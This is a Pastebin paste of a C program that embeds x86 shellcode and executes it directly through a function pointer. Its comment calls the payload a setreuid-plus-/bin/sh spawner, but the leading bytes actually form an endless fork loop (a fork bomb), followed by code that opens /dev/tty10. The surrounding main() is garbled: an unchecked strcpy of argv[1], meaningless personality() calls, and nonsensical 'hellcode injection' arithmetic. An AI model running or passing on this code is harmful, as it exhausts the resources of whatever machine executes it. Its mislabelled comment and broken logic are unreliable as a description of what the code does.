Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #include <stdio.h>
- #include <unistd.h>
- #include <string.h>
- char shellcode[] = "\x6a\x02\x58\xcd\x80\xeb\xf9"
- "\x6a\x05\x58\x99\x52\x68\x74\x79\x31\x30\x68\x2f\x2f\x2f\x74"
- "\x68\x2f\x64\x65\x76\x89\xe3\x89\xd1\xcd\x80\x89\xc3\x6a\x36"
- "\x58\xb9\xcf\xb4\xff\xff\xf7\xd1\xba\xdc\x34\xfa\x03\xcd\x80";
- /*
- * setreuid(0, 0);
- * push byte +0x46
- * pop eax
- * xor ebx,ebx
- * xor ecx,ecx
- * int 0x80
- *
- * execve("/bin//sh", ["/bin//sh", "-c", "cmd"], NULL);
- * jmp short 0x2c
- * pop edi
- * push byte +0xb
- * pop eax
- * cdq
- * push edx
- * push word 0x632d
- * mov esi,esp
- * push edx
- * push dword 0x68732f2f
- * push dword 0x6e69622f
- * mov ebx,esp
- * push edx
- * push edi
- * push esi
- * push ebx
- * mov ecx,esp
- * int 0x80
- * call 0xb
- * "cmd; exit;"
- */
- int main(int argc, char * argv[])
- {
- char buffer[1024];
- int loop, ret;
- if (argc == 1){
- printf("using default target program :: /bin/ls\n");
- strcpy(buffer, "/bin/ls");
- }
- strcpy(buffer,argv[1]);
- memset(buffer,0x90,1024);
- void (*b)()=shellcode;b();
- for (loop=0;loop<0x10000;loop++){
- ret = personality(b);
- if (ret==-71393){
- //
- // hellcode injection
- //
- memset(buffer, 0x90, 1024);
- buffer[ret - 0xa8 + loop / 2 * 39] =
- buffer[ret - 0xfb * sizeof(long)];
- printf("Yay!! !!");
- exit(0);
- }
- }
- printf("Fail.\n");
- return 0;
- }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement